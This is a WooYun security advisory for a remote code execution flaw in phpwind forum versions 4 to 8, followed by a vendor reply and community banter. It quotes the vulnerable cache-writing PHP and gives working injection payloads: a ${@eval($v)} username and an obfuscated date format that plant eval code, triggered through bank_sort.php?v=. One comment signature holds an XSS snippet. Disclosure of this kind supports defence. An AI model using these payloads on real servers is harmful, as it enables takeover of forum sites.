当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153249

漏洞标题:Phpwind的v4/5/6/7/8命令执行漏洞

相关厂商:phpwind

漏洞作者: 路人甲

提交时间:2015-11-10 11:55

修复时间:2016-02-08 15:10

公开时间:2016-02-08 15:10

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-08: 细节向公众公开

简要描述:

07年那阵挖掘的漏洞,正好这次三个白帽搞了个挑战,借这个机会曝光吧,外面估计也有部分人知道这个吧:)

详细说明:

hack/bank/index.php

$_DDESPOSTDB=array();
		$query=$db->query("SELECT i.uid,username,ddeposit,dstartdate FROM pw_memberinfo i LEFT JOIN pw_members m ON m.uid=i.uid ORDER BY ddeposit DESC LIMIT $bk_num");
		while($deposit=$db->fetch_array($query)){
			if($deposit['ddeposit']){
				$deposit['dstartdate']=get_date($deposit['dstartdate']);
				$_DDESPOSTDB[]=array($deposit['uid'],$deposit['username'],$deposit['ddeposit'],$deposit['dstartdate']);
			}
		}
		$wirtedb=savearray('_DESPOSTDB',$_DESPOSTDB);
		$wirtedb.="\n".savearray('_DDESPOSTDB',$_DDESPOSTDB);
		writeover(D_P.'data/bbscache/bank_sort.php',"<?php\r\n".$wirtedb.'?>');
	}
...
function savearray($name,$array){
	$arraydb="\$$name=array(\r\n\t\t";	
	foreach($array as $value1){
		$arraydb.='array(';
		foreach($value1 as $value2){
			$arraydb.='"'.addslashes($value2).'",';
		}
		$arraydb.="),\r\n\t\t";
	}
	$arraydb.=");\r\n";
	return $arraydb;
}


挺明显的一个漏洞,里面可以利用的点是注册的用户名和日期格式,不过这两个地方都有字数限制,真正要利用起来的话需要点技巧,废话不多说了,直接贴上当时写的一个简单的利用方式:

phpwind所有版本远程代码执行漏洞
i)
注册新用户,用户名为${@eval($v)},发表新帖或其他方式获得金钱后,使用银行插件进行存款,待论坛缓存更新后[默认为5小时],data/bbscache/bank_sort.php文件会含有如下代码:
eval($v)
利用方法[PW6以上版本需要register_globals=on]:
**.**.**.**/phpwind/data/bbscache/bank_sort.php?v=phpinfo();
**.**.**.**/phpwind/hack.php?H_name=bank&v=phpinfo();
ii)
编辑用户资料,在[日期格式][自定义]处填写${@\ev\a\l($v)},使用银行插件进行存款,待论坛缓存更新后[默认为5小时],data/bbscache/bank_sort.php文件会含有如下代码:
eval($v)
利用方法[PW6以上版本需要register_globals=on]:
**.**.**.**/phpwind/data/bbscache/bank_sort.php?v=phpinfo();
**.**.**.**/phpwind/hack.php?H_name=bank&v=phpinfo();


成文较早,并且关于PW6的说明是后加入的,因为没怎么跟PW5后的代码,当时的描述可能不准确,后来听某人跟我反馈说PW6里貌似有可直接利用的变量,从而绕过全局的限制,我就不再验证了,有兴趣的自行跟。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-08 15:10

厂商回复:

您好,该问题已有白帽子在ASRC平台上报,并于2014年12月份修复(版本8.7及以上)。由于phpwind目前仅维护phpwind8.7及以上版本,其他低版本已不再更新,建议仍在使用低版本的用户尽快升级到最新版;如要继续使用老版本,请参考phpwind官方论坛说明自行修复(由于修复方法只针对8.7,其他版本未进行有效测试,仅做参考:《[漏洞补丁]phpwind8.7 利用注册特殊用户致可执行任意命令高危漏洞 》http:///read/)。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-10 12:17 | phith0n 认证白帽子 ( 普通白帽子 | Rank:718 漏洞数:114 | 一个想当文人的黑客~)

    是不是Ryat老师!!

  2. 2015-11-10 12:20 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3783 漏洞数:292 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    是不是Ryat老师!!

  3. 2015-11-10 12:20 | 牛肉包子 ( 普通白帽子 | Rank:266 漏洞数:67 | baozisec)

    是不是Ryat老师!!

  4. 2015-11-10 12:24 | DNS ( 普通白帽子 | Rank:696 漏洞数:73 | root@qisec.com)

    @猪猪侠 是不是你匿名了

  5. 2015-11-10 12:25 | Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)

    你关注的 猪猪侠 提交了phpwind....

  6. 2015-11-10 12:30 | 咚咚呛 ( 普通白帽子 | Rank:116 漏洞数:10 | 我是一只小毛驴咿呀咿呀呦~~)

    你关注的 猪猪侠 提交了phpwind....

  7. 2015-11-10 12:31 | sqlfeng ( 普通白帽子 | Rank:343 漏洞数:52 | http://weibo.com/fds1986)

    第一排3D戴好坐等打雷。

  8. 2015-11-10 12:34 | Noxxx ( 普通白帽子 | Rank:668 漏洞数:51 )

    是不是Ryat老师!!

  9. 2015-11-10 12:37 | Mieless ( 实习白帽子 | Rank:35 漏洞数:10 | 我是来打酱油的。)

    shot

  10. 2015-11-10 12:41 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:430 漏洞数:123 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    你关注的白帽子 猪猪侠 发表了漏洞 phpwind < v6 版本命令执行漏洞

  11. 2015-11-10 12:42 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:430 漏洞数:123 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    到底是谁?!!!!

  12. 2015-11-10 13:03 | 随风的风 ( 普通白帽子 | Rank:201 漏洞数:69 | 微信公众号:233sec 不定期分享各种漏洞思...)

    怎么给cncert了?不该是phpWind吗?

  13. 2015-11-10 13:23 | 浮世浮城 ( 普通白帽子 | Rank:825 漏洞数:146 | 我存于这俗世烟火的浮世,我爱这时光倒影的...)

    你关注的 猪猪侠 提交了phpwind....

  14. 2015-11-10 13:31 | boooooom 认证白帽子 ( 普通白帽子 | Rank:473 漏洞数:51 | 我有一个好想法!)

    腻害!

  15. 2015-11-10 13:52 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    0day!phpwind已经停止维护了吧,坐等公开

  16. 2015-11-10 14:04 | 0xev4l ( 路人 | Rank:0 漏洞数:1 | 努力吧!骚年!北京买房买车买菜!)

    你关注的 猪猪侠 提交了phpwind....

  17. 2015-11-10 14:28 | 不能忍 ( 实习白帽子 | Rank:80 漏洞数:41 | 要是能重来,我要选李白!)

    等漏洞确认了,看一下乌云榜的通用就知道是谁了。。哈哈

  18. 2015-11-10 14:41 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    你关注的 猪猪侠 提交了phpwind....

  19. 2015-11-10 14:45 | 奶嘴 ( 普通白帽子 | Rank:112 漏洞数:28 | 16岁的毛孩)

    是不是Ryat老师!!

  20. 2015-11-10 15:13 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3783 漏洞数:292 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    这个漏洞真的补好了嘛?

  21. 2015-11-10 16:20 | ago ( 普通白帽子 | Rank:544 漏洞数:93 )

    猪哥这句话包含两点1.洞是猪哥发的2.看来是没修复好,还有利用姿势

  22. 2015-11-10 16:24 | 不能忍 ( 实习白帽子 | Rank:80 漏洞数:41 | 要是能重来,我要选李白!)

    楼上正解

  23. 2015-11-11 20:33 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    就是ryat!!!

  24. 2015-11-11 20:41 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3783 漏洞数:292 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @ago 不是我发的

  25. 2016-01-12 15:20 | 酷帥王子 ( 普通白帽子 | Rank:222 漏洞数:62 | 天人合一,乃屌神也!)

    @猪猪侠 咦,猪哥的核心白帽子去哪里啦